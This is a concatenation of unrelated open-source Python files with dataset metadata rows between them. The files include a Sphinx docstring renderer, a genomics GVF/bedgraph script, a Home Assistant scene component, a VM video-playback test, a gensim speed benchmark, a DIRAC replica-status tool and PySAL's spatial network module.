out += ['']
for param, param_type, desc in self[name]:
out += self._str_indent(['**%s** : %s' % (param.strip(),
param_type)])
out += ['']
out += self._str_indent(desc, 8)
out += ['']
return out
@property
def _obj(self):
if hasattr(self, '_cls'):
return self._cls
elif hasattr(self, '_f'):
return self._f
return None
def _str_member_list(self, name):
"""
Generate a member listing, autosummary:: table where possible,
and a table where not.
"""
out = []
if self[name]:
out += ['.. rubric:: %s' % name, '']
prefix = getattr(self, '_name', '')
if prefix:
prefix = '~%s.' % prefix
autosum = []
others = []
for param, param_type, desc in self[name]:
param = param.strip()
if not self._obj or hasattr(self._obj, param):
autosum += [" %s%s" % (prefix, param)]
else:
others.append((param, param_type, desc))
if False and autosum:
out += ['.. autosummary::', ' :toctree:', '']
out += autosum
if others:
maxlen_0 = max([len(x[0]) for x in others])
maxlen_1 = max([len(x[1]) for x in others])
hdr = "=" * maxlen_0 + " " + "=" * maxlen_1 + " " + "=" * 10
fmt = '%%%ds %%%ds ' % (maxlen_0, maxlen_1)
n_indent = maxlen_0 + maxlen_1 + 4
out += [hdr]
for param, param_type, desc in others:
out += [fmt % (param.strip(), param_type)]
out += self._str_indent(desc, n_indent)
out += [hdr]
out += ['']
return out
def _str_section(self, name):
out = []
if self[name]:
out += self._str_header(name)
out += ['']
content = textwrap.dedent("\n".join(self[name])).split("\n")
out += content
out += ['']
return out
def _str_see_also(self, func_role):
out = []
if self['See Also']:
see_also = super(SphinxDocString, self)._str_see_also(func_role)
out = ['.. seealso::', '']
out += self._str_indent(see_also[2:])
return out
def _str_warnings(self):
out = []
if self['Warnings']:
out = ['.. warning::', '']
out += self._str_indent(self['Warnings'])
return out
def _str_index(self):
idx = self['index']
out = []
if len(idx) == 0:
return out
out += ['.. index:: %s' % idx.get('default', '')]
for section, references in idx.items():
if section == 'default':
continue
elif section == 'refguide':
out += [' single: %s' % (', '.join(references))]
else:
out += [' %s: %s' % (section, ','.join(references))]
return out
def _str_references(self):
out = []
if self['References']:
out += self._str_header('References')
if isinstance(self['References'], str):
self['References'] = [self['References']]
out.extend(self['References'])
out += ['']
# Latex collects all references to a separate bibliography,
# so we need to insert links to it
if sphinx.__version__ >= "0.6":
out += ['.. only:: latex', '']
else:
out += ['.. latexonly::', '']
items = []
for line in self['References']:
m = re.match(r'.. \[([a-z0-9._-]+)\]', line, re.I)
if m:
items.append(m.group(1))
out += [' ' + ", ".join(["[%s]_" % item for item in items]), '']
return out
def _str_examples(self):
examples_str = "\n".join(self['Examples'])
if (self.use_plots and 'import matplotlib' in examples_str
and 'plot::' not in examples_str):
out = []
out += self._str_header('Examples')
out += ['.. plot::', '']
out += self._str_indent(self['Examples'])
out += ['']
return out
else:
return self._str_section('Examples')
def __str__(self, indent=0, func_role="obj"):
out = []
out += self._str_signature()
out += self._str_index() + ['']
out += self._str_summary()
out += self._str_extended_summary()
for param_list in ('Parameters', 'Returns', 'Raises'):
out += self._str_param_list(param_list)
out += self._str_warnings()
out += self._str_see_also(func_role)
out += self._str_section('Notes')
out += self._str_references()
out += self._str_examples()
for param_list in ('Attributes', 'Methods'):
out += self._str_member_list(param_list)
out = self._str_indent(out, indent)
return '\n'.join(out)
class SphinxFunctionDoc(SphinxDocString, FunctionDoc):
def __init__(self, obj, doc=None, config={}):
self.use_plots = config.get('use_plots', False)
FunctionDoc.__init__(self, obj, doc=doc, config=config)
class SphinxClassDoc(SphinxDocString, ClassDoc):
def __init__(self, obj, doc=None, func_doc=None, config={}):
self.use_plots = config.get('use_plots', False)
ClassDoc.__init__(self, obj, doc=doc, func_doc=None, config=config)
class SphinxObjDoc(SphinxDocString):
def __init__(self, obj, doc=None, config={}):
self._f = obj
SphinxDocString.__init__(self, doc, config=config)
def get_doc_object(obj, what=None, doc=None, config={}):
if what is None:
if inspect.isclass(obj):
what = 'class'
elif inspect.ismodule(obj):
what = 'module'
elif callable(obj):
what = 'function'
else:
what = 'object'
if what == 'class':
return SphinxClassDoc(obj, func_doc=SphinxFunctionDoc, doc=doc,
config=config)
elif what in ('function', 'method'):
return SphinxFunctionDoc(obj, doc=doc, config=config)
else:
if doc is None:
doc = pydoc.getdoc(obj)
return SphinxObjDoc(obj, doc, config=config)
| mit | -3,323,854,367,741,622,000 | 31.567227 | 78 | 0.475164 | false |
NCBI-Hackathons/Structural_Variant_Comparison | py/make_gvf_and_bedgraph.py | 1 | 4465 | #!/bin/bash
# Authors: Yan Kai, Jeffery Hsu
# GRCh38
import sys,re,os
from optparse import OptionParser
import pandas as pd
import HTSeq
def inner_outer_pref(line, suffix):
'''
Preferences outer + suffix -> suffix -> inner + suffix
'''
prefix = ['inner_', '', 'outer_']
test = [i + suffix for i in prefix]
for i in test:
if(not pd.isnull(line[i])):
out = int(line[i])
return(out)
def VariantCallTabReader(filepath, chrom_size):
"""
This function aims to read the variant calls from the merged studies which
contain various types of variant types.
"""
infile = pd.read_csv(filepath, sep="\t")
# var_types is a dic keyed by var_type and valued by a list of genomic intervals
var_types_ga = {}
var_types_id = {}
for _, line in infile.iterrows():
var_type = str(line['var_type'])
var_type = var_type.replace(" ","_")
if var_type not in var_types_ga.keys():
var_types_ga[var_type] = []
var_types_id[var_type] = []
chrom = 'chr'+ str(line['chr'])
accesion = line[0]
if (chrom in chrom_size.keys()):
start = inner_outer_pref(line, 'start')
end = inner_outer_pref(line, 'stop')
# Create a 'Genomic interval' from this variant call
iv = HTSeq.GenomicInterval(chrom, start, end, ".")
var_types_ga[var_type].append(iv)
var_types_id[var_type].append(accesion)
return((var_types_ga,var_types_id))
def write_to_gvf(ga,nssd, var_type, outfile):
"""
ga is the genomic array.
"""
outfile = open(outfile, 'w')
ivs = list(ga.steps())
ids = list(nssd.steps())
num_iv = len(ivs)
outline = '##gvf-version 1.00\n'
outfile.write(outline)
source = 'dbVar'
score = '.'
strand = '.'
phase = '.'
for i in xrange(num_iv):
chrom = ivs[i][0].chrom
start = ivs[i][0].start+1
end = ivs[i][0].end
ID = str(i+1)
count = ivs[i][1]
SSV = ids[i][1]
attributes = 'ID='+ID+';'+'count='+str(count)+';'+'SSV='+str(SSV)
outline =chrom+'\t'+source+'\t'+var_type+'\t'+str(start)+'\t'+str(end)+'\t'+score+'\t'+strand+'\t'+phase+'\t'+attributes+'\n'
outfile.write(outline)
outfile.close()
def main(argv):
parser = OptionParser()
parser.add_option("-r", "--chromsize", action="store", type="string", dest="chromsize", help="GRCh38 chromosome size file", metavar="<str>")
parser.add_option("-v", "--variantfile", action="store", type="string", dest="variantfile", metavar="<file>", help="the variant calls files in a specific format")
parser.add_option("-o", "--outdir", action="store", type="string", dest="outdir", metavar="<file>", help="the directory to store the output files")
(opt, args) = parser.parse_args(argv)
if len(argv) < 6:
parser.print_help()
sys.exit(1)
chrom_size_file = open(opt.chromsize,'r')
# Read chrom size information from the chrom_size_file.
chrom_size = {}
for line in chrom_size_file:
pline = line.strip()
sline = pline.split('\t')
chrom_size[sline[1]] = int(sline[0])
chrom_size_file.close()
var_types_ga = VariantCallTabReader(opt.variantfile,chrom_size)[0]
var_types_id = VariantCallTabReader(opt.variantfile,chrom_size)[1]
for var_type in var_types_ga.keys():
# Creat a 'Genomic Array' using HTSeq package
ga = HTSeq.GenomicArray( chrom_size, stranded=False, typecode="i" )
nssd = HTSeq.GenomicArrayOfSets(chrom_size, stranded=False)
variant_interval = var_types_ga[var_type]
variant_id = var_types_id[var_type]
# Get the count of variant calls in each region
variant_num = len(variant_interval)
print "For "+var_type+", there are "+str(variant_num)+" variant calls from the clustersed studies..."
for i in xrange(variant_num):
iv = variant_interval[i]
try:
ga[iv] += 1
nssd[iv] += variant_id[i]
except:
iv.length == 0
bedgraph = opt.outdir+'/'+var_type+'_dbVar.bedgraph'
ga.write_bedgraph_file(bedgraph, strand=".", track_options="")
gvf = opt.outdir+'/'+var_type+'_dbVar.gvf'
write_to_gvf(ga,nssd,var_type,gvf)
if __name__ == "__main__":
main(sys.argv)
| cc0-1.0 | 483,102,440,489,157,400 | 33.346154 | 166 | 0.576484 | false |
molobrakos/home-assistant | homeassistant/components/tahoma/scene.py | 7 | 1181 | """Support for Tahoma scenes."""
import logging
from homeassistant.components.scene import Scene
from . import DOMAIN as TAHOMA_DOMAIN
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Tahoma scenes."""
controller = hass.data[TAHOMA_DOMAIN]['controller']
scenes = []
for scene in hass.data[TAHOMA_DOMAIN]['scenes']:
scenes.append(TahomaScene(scene, controller))
add_entities(scenes, True)
class TahomaScene(Scene):
"""Representation of a Tahoma scene entity."""
def __init__(self, tahoma_scene, controller):
"""Initialize the scene."""
self.tahoma_scene = tahoma_scene
self.controller = controller
self._name = self.tahoma_scene.name
def activate(self):
"""Activate the scene."""
self.controller.launch_action_group(self.tahoma_scene.oid)
@property
def name(self):
"""Return the name of the scene."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the scene."""
return {'tahoma_scene_oid': self.tahoma_scene.oid}
| apache-2.0 | -8,298,200,972,585,649,000 | 27.804878 | 68 | 0.656224 | false |
spcui/tp-qemu | qemu/tests/rv_video.py | 5 | 2415 | """
rv_video.py - Starts video player
Video is played in a loop, usually kill_app
test should be called later to close totem.
Requires: binaries Xorg, totem, gnome-session
Test starts video player
"""
import logging
import os
from virttest import utils_misc, remote
def launch_totem(guest_session, params):
"""
Launch Totem player
:param guest_vm - vm object
"""
totem_version = guest_session.cmd('totem --version')
logging.info("Totem version: %s", totem_version)
# repeat parameters for totem
logging.info("Set up video repeat to '%s' to the Totem.",
params.get("repeat_video"))
if params.get("repeat_video") == "yes":
cmd = "gconftool-2 --set /apps/totem/repeat -t bool true"
else:
cmd = "gconftool-2 --set /apps/totem/repeat -t bool false"
guest_session.cmd(cmd)
cmd = "export DISPLAY=:0.0"
guest_session.cmd(cmd)
# fullscreen parameters for totem
if params.get("fullscreen"):
fullscreen = " --fullscreen "
else:
fullscreen = ""
cmd = "nohup totem %s %s --display=:0.0 --play &> /dev/null &" \
% (fullscreen, params.get("destination_video_file_path"))
guest_session.cmd(cmd)
def deploy_video_file(test, vm_obj, params):
"""
Deploy video file into destination on vm
:param vm_obj - vm object
:param params: Dictionary with the test parameters.
"""
source_video_file = params.get("source_video_file")
video_dir = os.path.join("deps", source_video_file)
video_path = utils_misc.get_path(test.virtdir, video_dir)
remote.copy_files_to(vm_obj.get_address(), 'scp',
params.get("username"),
params.get("password"),
params.get("shell_port"),
video_path,
params.get("destination_video_file_path"))
def run(test, params, env):
"""
Test of video through spice
:param test: KVM test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
guest_vm = env.get_vm(params["guest_vm"])
guest_vm.verify_alive()
guest_session = guest_vm.wait_for_login(
timeout=int(params.get("login_timeout", 360)))
deploy_video_file(test, guest_vm, params)
launch_totem(guest_session, params)
guest_session.close()
| gpl-2.0 | 3,130,335,405,542,363,000 | 27.411765 | 68 | 0.615321 | false |
loisaidasam/gensim | gensim/test/simspeed2.py | 14 | 6388 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s CORPUS_DENSE.mm CORPUS_SPARSE.mm [NUMDOCS]
Run speed test of similarity queries. Only use the first NUMDOCS documents of \
each corpus for testing (or use all if no NUMDOCS is given).
The two sample corpora can be downloaded from http://nlp.fi.muni.cz/projekty/gensim/wikismall.tgz
Example: ./simspeed2.py wikismall.dense.mm wikismall.sparse.mm
"""
import logging
import sys
import itertools
import os
import math
from time import time
import numpy as np
import scipy.sparse
import gensim
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
logging.info("running %s" % " ".join(sys.argv))
# check and process cmdline input
program = os.path.basename(sys.argv[0])
if len(sys.argv) < 3:
print(globals()['__doc__'] % locals())
sys.exit(1)
corpus_dense = gensim.corpora.MmCorpus(sys.argv[1])
corpus_sparse = gensim.corpora.MmCorpus(sys.argv[2])
dense_features, sparse_features = corpus_dense.num_terms, corpus_sparse.num_terms
if len(sys.argv) > 3:
NUMDOCS = int(sys.argv[3])
corpus_dense = list(itertools.islice(corpus_dense, NUMDOCS))
corpus_sparse = list(itertools.islice(corpus_sparse, NUMDOCS))
# create the query index to be tested (one for dense input, one for sparse)
index_dense = gensim.similarities.Similarity('/tmp/tstdense', corpus_dense, dense_features)
index_sparse = gensim.similarities.Similarity('/tmp/tstsparse', corpus_sparse, sparse_features)
density = 100.0 * sum(shard.num_nnz for shard in index_sparse.shards) / (len(index_sparse) * sparse_features)
logging.info("test 1 (dense): similarity of all vs. all (%i documents, %i dense features)" %
(len(corpus_dense), index_dense.num_features))
for chunksize in [1, 8, 32, 64, 128, 256, 512, 1024, index_dense.shardsize]:
index_dense.chunksize = chunksize
start = time()
for sim in index_dense:
pass
taken = time() - start
queries = math.ceil(1.0 * len(corpus_dense) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(corpus_dense) / taken, queries / taken))
index_dense.num_best = 10
logging.info("test 2 (dense): as above, but only ask for the top-10 most similar for each document")
for chunksize in [1, 8, 32, 64, 128, 256, 512, 1024, index_dense.shardsize]:
index_dense.chunksize = chunksize
start = time()
sims = [sim for sim in index_dense]
taken = time() - start
queries = math.ceil(1.0 * len(corpus_dense) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(corpus_dense) / taken, queries / taken))
index_dense.num_best = None
logging.info("test 3 (sparse): similarity of all vs. all (%i documents, %i features, %.2f%% density)" %
(len(corpus_sparse), index_sparse.num_features, density))
for chunksize in [1, 5, 10, 100, 256, 500, 1000, index_sparse.shardsize]:
index_sparse.chunksize = chunksize
start = time()
for sim in index_sparse:
pass
taken = time() - start
queries = math.ceil(1.0 * len(corpus_sparse) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(corpus_sparse) / taken, queries / taken))
index_sparse.num_best = 10
logging.info("test 4 (sparse): as above, but only ask for the top-10 most similar for each document")
for chunksize in [1, 5, 10, 100, 256, 500, 1000, index_sparse.shardsize]:
index_sparse.chunksize = chunksize
start = time()
for sim in index_sparse:
pass
taken = time() - start
queries = math.ceil(1.0 * len(corpus_sparse) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(corpus_sparse) / taken, queries / taken))
index_sparse.num_best = None
# Difference between test #5 and test #1 is that the query in #5 is a gensim iterable
# corpus, while in #1, the index is used directly (numpy arrays). So #5 is slower,
# because it needs to convert sparse vecs to numpy arrays and normalize them to
# unit length=extra work, which #1 avoids.
query = list(itertools.islice(corpus_dense, 1000))
logging.info("test 5 (dense): dense corpus of %i docs vs. index (%i documents, %i dense features)" %
(len(query), len(index_dense), index_dense.num_features))
for chunksize in [1, 8, 32, 64, 128, 256, 512, 1024]:
start = time()
if chunksize > 1:
sims = []
for chunk in gensim.utils.chunkize_serial(query, chunksize):
_ = index_dense[chunk]
else:
for vec in query:
_ = index_dense[vec]
taken = time() - start
queries = math.ceil(1.0 * len(query) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(query) / taken, queries / taken))
# Same comment as for test #5.
query = list(itertools.islice(corpus_dense, 1000))
logging.info("test 6 (sparse): sparse corpus of %i docs vs. sparse index (%i documents, %i features, %.2f%% density)" %
(len(query), len(corpus_sparse), index_sparse.num_features, density))
for chunksize in [1, 5, 10, 100, 500, 1000]:
start = time()
if chunksize > 1:
sims = []
for chunk in gensim.utils.chunkize_serial(query, chunksize):
_ = index_sparse[chunk]
else:
for vec in query:
_ = index_sparse[vec]
taken = time() - start
queries = math.ceil(1.0 * len(query) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(query) / taken, queries / taken))
logging.info("finished running %s" % program)
| lgpl-2.1 | -3,182,038,977,800,247,000 | 44.304965 | 123 | 0.615842 | false |
wkrzemien/DIRAC | DataManagementSystem/scripts/dirac-dms-change-replica-status.py | 4 | 1594 | #! /usr/bin/env python
########################################################################
# $HeadURL$
########################################################################
from __future__ import print_function
__RCSID__ = "$Id$"
from DIRAC import exit as DIRACExit
from DIRAC.Core.Base import Script
Script.setUsageMessage("""
Change status of replica of a given file or a list of files at a given Storage Element
Usage:
%s <lfn | fileContainingLfns> <SE> <status>
""" % Script.scriptName)
Script.parseCommandLine()
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
catalog = FileCatalog()
import os
args = Script.getPositionalArgs()
if not len(args) == 3:
Script.showHelp()
DIRACExit( -1 )
else:
inputFileName = args[0]
se = args[1]
newStatus = args[2]
if os.path.exists(inputFileName):
inputFile = open(inputFileName,'r')
string = inputFile.read()
lfns = string.splitlines()
inputFile.close()
else:
lfns = [inputFileName]
res = catalog.getReplicas( lfns, True )
if not res['OK']:
print(res['Message'])
DIRACExit( -1 )
replicas = res['Value']['Successful']
lfnDict = {}
for lfn in lfns:
lfnDict[lfn] = {}
lfnDict[lfn]['SE'] = se
lfnDict[lfn]['Status'] = newStatus
lfnDict[lfn]['PFN'] = replicas[lfn][se]
res = catalog.setReplicaStatus( lfnDict )
if not res['OK']:
print("ERROR:", res['Message'])
if res['Value']['Failed']:
print("Failed to update %d replica status" % len(res['Value']['Failed']))
if res['Value']['Successful']:
print("Successfully updated %d replica status" % len(res['Value']['Successful']))
| gpl-3.0 | 2,460,868,614,277,936,600 | 26.016949 | 87 | 0.61857 | false |
TaylorOshan/pysal | pysal/network/network.py | 5 | 42024 | from collections import defaultdict, OrderedDict
import math
import os
import cPickle
import copy
import numpy as np
import pysal as ps
from pysal.weights.util import get_ids
from analysis import NetworkG, NetworkK, NetworkF
import util
__all__ = ["Network", "PointPattern", "NetworkG", "NetworkK", "NetworkF"]
class Network:
"""
Spatially constrained network representation and analytical functionality.
Parameters
-----------
in_shp: str
The input shapefile. This must be in .shp format.
node_sig: int
Round the x and y coordinates of all nodes to node_sig significant
digits (combined significant digits on the left and right
of the decimal place)
-- Default is 11
-- Set to None for no rounding
unique_segs: bool
If True (default), keep only unique segments (i.e., prune out any
duplicated segments).
If False keep all segments.
Attributes
----------
in_shp: str
The input shapefile. This must be in .shp format.
adjacencylist: list
List of lists storing node adjacency.
nodes: dict
Keys are tuples of node coords and values are the node ID.
edge_lengths: dict
Keys are tuples of sorted node IDs representing an edge and values are
the length.
pointpatterns: dict
Keys are a string name of the pattern and values are point pattern
class instances.
node_coords: dict
Keys are the node ID and values are the (x,y) coordinates inverse
to nodes.
edges: list
List of edges, where each edge is a sorted tuple of node IDs.
node_list: list
List of node IDs.
alldistances: dict
Keys are the node IDs.
Values are tuples with two elements:
1. A list of the shortest path distances
2. A dict with the key being the id of the destination node and
the value being a list of the shortest path.
Examples
--------
Instantiate an instance of a network.
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
Snap point observations to the network with attribute information.
>>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
And without attribute information.
>>> ntw.snapobservations(ps.examples.get_path('schools.shp'), 'schools', attribute=False)
"""
def __init__(self, in_shp=None, node_sig=11, unique_segs=True):
if in_shp:
self.in_shp = in_shp
self.node_sig = node_sig
self.unique_segs = unique_segs
self.adjacencylist = defaultdict(list)
self.nodes = {}
self.edge_lengths = {}
self.edges = []
self.pointpatterns = {}
self._extractnetwork()
self.node_coords = dict((value, key) for key, value in self.nodes.iteritems())
# This is a spatial representation of the network.
self.edges = sorted(self.edges)
# Extract the graph.
self.extractgraph()
self.node_list = sorted(self.nodes.values())
def _round_sig(self, v):
"""
Used internally to round the vertex to a set number of significant digits. If sig
is set to 4, then the following are some possible results for a coordinate:
0.0xxxx, 0.xxxx, x.xxx, xx.xx, xxx.x, xxxx.0, xxxx0.0
"""
sig = self.node_sig
if sig is None:
return v
out_v = [val if 0 \
else round(val, -int(math.floor(math.log10(math.fabs(val)))) +\
(sig-1)) \
for val in v]
return tuple(out_v)
def _extractnetwork(self):
"""
Used internally, to extract a network from a polyline shapefile.
"""
nodecount = 0
shps = ps.open(self.in_shp)
for shp in shps:
vertices = shp.vertices
for i, v in enumerate(vertices[:-1]):
v = self._round_sig(v)
try:
vid = self.nodes[v]
except:
self.nodes[v] = vid = nodecount
nodecount += 1
v2 = self._round_sig(vertices[i+1])
try:
nvid = self.nodes[v2]
except:
self.nodes[v2] = nvid = nodecount
nodecount += 1
self.adjacencylist[vid].append(nvid)
self.adjacencylist[nvid].append(vid)
# Sort the edges so that mono-directional keys can be stored.
edgenodes = sorted([vid, nvid])
edge = tuple(edgenodes)
self.edges.append(edge)
length = util.compute_length(v, vertices[i+1])
self.edge_lengths[edge] = length
if self.unique_segs == True:
# Remove duplicate edges and duplicate adjacent nodes.
self.edges = list(set(self.edges))
for k, v in self.adjacencylist.iteritems():
self.adjacencylist[k] = list(set(v))
def extractgraph(self):
"""
Using the existing network representation, create a graph based representation by
removing all nodes with a neighbor incidence of two. That is, we assume these
nodes are bridges between nodes with higher incidence.
"""
self.graphedges = []
self.edge_to_graph = {}
self.graph_lengths = {}
# Find all nodes with cardinality 2.
segment_nodes = []
for k, v in self.adjacencylist.iteritems():
#len(v) == 1 #cul-de-sac
#len(v) == 2 #bridge segment
#len(v) > 2 #intersection
if len(v) == 2:
segment_nodes.append(k)
# Start with a copy of the spatial representation and iteratively remove edges
# deemed to be segments.
self.graphedges = copy.deepcopy(self.edges)
self.graph_lengths = copy.deepcopy(self.edge_lengths)
# Mapping all the edges contained within a single graph represented edge.
self.graph_to_edges = {}
bridges = []
for s in segment_nodes:
bridge = [s]
neighbors = self._yieldneighbor(s, segment_nodes, bridge)
while neighbors:
cnode = neighbors.pop()
segment_nodes.remove(cnode)
bridge.append(cnode)
newneighbors = self._yieldneighbor(cnode, segment_nodes, bridge)
neighbors += newneighbors
bridges.append(bridge)
for bridge in bridges:
if len(bridge) == 1:
n = self.adjacencylist[bridge[0]]
newedge = tuple(sorted([n[0], n[1]]))
# Identify the edges to be removed.
e1 = tuple(sorted([bridge[0], n[0]]))
e2 = tuple(sorted([bridge[0], n[1]]))
# Remove them from the graph.
self.graphedges.remove(e1)
self.graphedges.remove(e2)
# Remove from the edge lengths.
length_e1 = self.edge_lengths[e1]
length_e2 = self.edge_lengths[e2]
self.graph_lengths.pop(e1, None)
self.graph_lengths.pop(e2, None)
self.graph_lengths[newedge] = length_e1 + length_e2
# Update the pointers.
self.graph_to_edges[e1] = newedge
self.graph_to_edges[e2] = newedge
else:
cumulative_length = 0
startend = {}
redundant = set([])
for b in bridge:
for n in self.adjacencylist[b]:
if n not in bridge:
startend[b] = n
else:
redundant.add(tuple(sorted([b,n])))
newedge = tuple(sorted(startend.values()))
for k, v in startend.iteritems():
redundant.add(tuple(sorted([k,v])))
for r in redundant:
self.graphedges.remove(r)
cumulative_length += self.edge_lengths[r]
self.graph_lengths.pop(r, None)
self.graph_to_edges[r] = newedge
self.graph_lengths[newedge] = cumulative_length
self.graphedges.append(newedge)
self.graphedges = sorted(self.graphedges)
def _yieldneighbor(self, node, segment_nodes, bridge):
"""
Used internally, this method traverses a bridge segement to find the source and
destination nodes.
"""
n = []
for i in self.adjacencylist[node]:
if i in segment_nodes and i not in bridge:
n.append(i)
return n
def contiguityweights(self, graph=True, weightings=None):
"""
Create a contiguity based W object
Parameters
----------
graph: bool
{True, False} controls whether the W is generated using the spatial
representation or the graph representation.
weightings: dict
Dict of lists of weightings for each edge.
Returns
-------
W: object
A PySAL W Object representing the binary adjacency of the network.
Examples
--------
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> w = ntw.contiguityweights(graph=False)
>>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
>>> counts = ntw.count_per_edge(ntw.pointpatterns['crimes'].obs_to_edge, graph=False)
Using the W object, access to ESDA functionality is provided. First,
a vector of attributes is created for all edges with observations.
>>> w = ntw.contiguityweights(graph=False)
>>> edges = w.neighbors.keys()
>>> y = np.zeros(len(edges))
>>> for i, e in enumerate(edges):
... if e in counts.keys():
... y[i] = counts[e]
Next, a standard call ot Moran is made and the result placed into `res`
>>> res = ps.esda.moran.Moran(y, w, permutations=99)
"""
neighbors = {}
neighbors = OrderedDict()
if graph:
edges = self.graphedges
else:
edges = self.edges
if weightings:
weights = {}
else:
weights = None
for key in edges:
neighbors[key] = []
if weightings:
weights[key] = []
for neigh in edges:
if key == neigh:
continue
if key[0] == neigh[0] or key[0] == neigh[1] or key[1] == neigh[0]\
or key[1] == neigh[1]:
neighbors[key].append(neigh)
if weightings:
weights[key].append(weightings[neigh])
# TODO: Add a break condition - everything is sorted, so we know when we
# have stepped beyond a possible neighbor.
#if key[1] > neigh[1]: #NOT THIS
#break
return ps.weights.W(neighbors, weights=weights)
def distancebandweights(self, threshold):
"""
Create distance based weights
Parameters
----------
threshold: float
Distance threshold value.
"""
try:
hasattr(self.alldistances)
except:
self.node_distance_matrix()
neighbor_query = np.where(self.distancematrix < threshold)
neighbors = defaultdict(list)
for i, n in enumerate(neighbor_query[0]):
neigh = neighbor_query[1][i]
if n != neigh:
neighbors[n].append(neighbor_query[1][i])
return ps.weights.W(neighbors)
def snapobservations(self, shapefile, name, idvariable=None, attribute=None):
"""
Snap a point pattern shapefile to this network object. The point pattern is
stored in the network.pointpattern['key'] attribute of the network object.
Parameters
----------
shapefile: str
The path to the shapefile.
name: str
Name to be assigned to the point dataset.
idvariable: str
Column name to be used as ID variable.
attribute: bool
Defines whether attributes should be extracted.
True for attribute extraction.
False for no attribute extraaction.
Returns
-------
"""
self.pointpatterns[name] = PointPattern(shapefile, idvariable=idvariable, attribute=attribute)
self._snap_to_edge(self.pointpatterns[name])
def compute_distance_to_nodes(self, x, y, edge):
"""
Given an observation on a network edge, return the distance to the two nodes that
bound that end.
Parameters
----------
x: float
x-coordinate of the snapped point.
y: float
y-coordiante of the snapped point.
edge: tuple
(node0, node1) representation of the network edge.
Returns
-------
d1: float
The distance to node0.
- always the node with the lesser id
d2: float
The distance to node1.
- always the node with the greater id
"""
d1 = util.compute_length((x,y), self.node_coords[edge[0]])
d2 = util.compute_length((x,y), self.node_coords[edge[1]])
return d1, d2
def _snap_to_edge(self, pointpattern):
"""
Used internally to snap point observations to network edges.
Parameters
-----------
pointpattern: object
PySAL Point Pattern Object
Returns
-------
obs_to_edge: dict
Dict with edges as keys and lists of points as values.
edge_to_obs: dict
Dict with point ids as keys and edge tuples as values.
dist_to_node: dict
Dict with point ids as keys and values as dicts with keys for
node ids and values as distances from point to node.
"""
obs_to_edge = {}
dist_to_node = {}
pointpattern.snapped_coordinates = {}
segments = []
s2e = {}
for edge in self.edges:
head = self.node_coords[edge[0]]
tail = self.node_coords[edge[1]]
segments.append(ps.cg.Chain([head,tail]))
s2e[(head,tail)] = edge
points = {}
p2id = {}
for pointIdx, point in pointpattern.points.iteritems():
points[pointIdx] = point['coordinates']
snapped = util.snapPointsOnSegments(points, segments)
for pointIdx, snapInfo in snapped.iteritems():
x,y = snapInfo[1].tolist()
edge = s2e[tuple(snapInfo[0])]
if edge not in obs_to_edge:
obs_to_edge[edge] = {}
obs_to_edge[edge][pointIdx] = (x,y)
pointpattern.snapped_coordinates[pointIdx] = (x,y)
d1,d2 = self.compute_distance_to_nodes(x, y, edge)
dist_to_node[pointIdx] = {edge[0]:d1, edge[1]:d2}
obs_to_node = defaultdict(list)
for k, v in obs_to_edge.iteritems():
keys = v.keys()
obs_to_node[k[0]] = keys
obs_to_node[k[1]] = keys
pointpattern.obs_to_edge = obs_to_edge
pointpattern.dist_to_node = dist_to_node
pointpattern.obs_to_node = obs_to_node
def count_per_edge(self, obs_on_network, graph=True):
"""
Compute the counts per edge.
Parameters
----------
obs_on_network: dict
Dict of observations on the network.
{(edge):{pt_id:(coords)}} or {edge:[(coord),(coord),(coord)]}
Returns
-------
counts: dict
{(edge):count}
Example
-------
Note that this passes the obs_to_edge attribute of a point pattern snapped to the
network.
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
>>> counts = ntw.count_per_edge(ntw.pointpatterns['crimes'].obs_to_edge,graph=False)
>>> s = sum([v for v in counts.itervalues()])
>>> s
287
"""
counts = {}
if graph:
for key, observations in obs_on_network.iteritems():
cnt = len(observations)
if key in self.graph_to_edges.keys():
key = self.graph_to_edges[key]
try:
counts[key] += cnt
except:
counts[key] = cnt
else:
for key in obs_on_network.iterkeys():
counts[key] = len(obs_on_network[key])
return counts
def _newpoint_coords(self, edge, distance):
"""
Used internally to compute new point coordinates during snapping.
"""
x1 = self.node_coords[edge[0]][0]
y1 = self.node_coords[edge[0]][1]
x2 = self.node_coords[edge[1]][0]
y2 = self.node_coords[edge[1]][1]
if x1 == x2: # Vertical line case
x0 = x1
if y1 < y2:
y0 = y1 + distance
elif y1 > y2:
y0 = y2 + distance
else: # Zero length edge
y0 = y1
return x0, y0
m = (y2 - y1) / (x2 - x1)
if x1 > x2:
x0 = x1 - distance / math.sqrt(1 + m**2)
elif x1 < x2:
x0 = x1 + distance / math.sqrt(1 + m**2)
y0 = m * (x0 - x1) + y1
return x0, y0
def simulate_observations(self, count, distribution='uniform'):
"""
Generate a simulated point pattern on the network.
Parameters
----------
count: int
The number of points to create or mean of the distribution if not
'uniform'.
distribution: str
{'uniform', 'poisson'} distribution of random points.
Returns
-------
random_pts: dict
Keys are the edge tuple.
